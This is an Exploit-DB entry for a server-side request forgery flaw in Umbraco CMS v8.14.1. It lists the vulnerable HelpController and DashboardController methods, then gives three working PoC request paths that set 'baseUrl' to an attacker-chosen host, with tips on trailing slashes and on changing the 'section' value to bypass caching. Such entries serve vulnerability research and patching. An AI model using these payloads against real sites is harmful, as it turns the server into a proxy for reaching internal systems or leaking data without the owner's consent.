Umbraco v8.14.1 - 'baseUrl' SSRF

EDB-ID:

50462

CVE:

N/A

EDB Verified:

Author:

NgoAnhDuc

Type:

webapps

Exploit: /

Platform:

ASPX

Date:

2021-10-29

Vulnerable App:

# Exploit Title: Umbraco v8.14.1 - 'baseUrl' SSRF
# Date: July 5, 2021
# Exploit Author: NgoAnhDuc
# Vendor Homepage: https://our.umbraco.com/
# Software Link: https://our.umbraco.com/download/releases/8141
# Version: v8.14.1
# Affect: Umbraco CMS v8.14.1, Umbraco Cloud

Vulnerable code:

Umbraco.Web.Editors.HelpController.GetContextHelpForPage():
https://github.com/umbraco/Umbraco-CMS/blob/710ecf2537a8630d00db793877d5c169c5cf8095/src/Umbraco.Web/Editors/HelpController.cs#L14
Umbraco.Web.Editors.DashboardController.GetRemoteDashboardContent():
https://github.com/umbraco/Umbraco-CMS/blob/710ecf2537a8630d00db793877d5c169c5cf8095/src/Umbraco.Web/Editors/DashboardController.cs#L50
Umbraco.Web.Editors.DashboardController.GetRemoteDashboardCss():
https://github.com/umbraco/Umbraco-CMS/blob/710ecf2537a8630d00db793877d5c169c5cf8095/src/Umbraco.Web/Editors/DashboardController.cs#L91

PoC:

/umbraco/BackOffice/Api/Help/GetContextHelpForPage?section=content&tree=undefined&baseUrl=https://SSRF-HOST.EXAMPLE
/umbraco/backoffice/UmbracoApi/Dashboard/GetRemoteDashboardContent?section=TryToAvoidGetCacheItem111&baseUrl=
https://SSRF-HOST.EXAMPLE/
/umbraco/backoffice/UmbracoApi/Dashboard/GetRemoteDashboardCss?section=AvoidGetCacheItem&baseUrl=https://SSRF-HOST.EXAMPLE/

Notes:
- There's no "/" suffix in payload 1
- "/" suffix is required in payload 2 and payload 3
- "section" parameter value must be changed each exploit attempt

Tags:

Advisory/Source: Link

Databases	Links	Sites	Solutions
Exploits	Search Exploit-DB	OffSec	Courses and Certifications
Google Hacking	Submit Entry	Kali Linux	Learn Subscriptions
Papers	SearchSploit Manual	VulnHub	OffSec Cyber Range
Shellcodes	Exploit Statistics		Proving Grounds
			Penetration Testing Services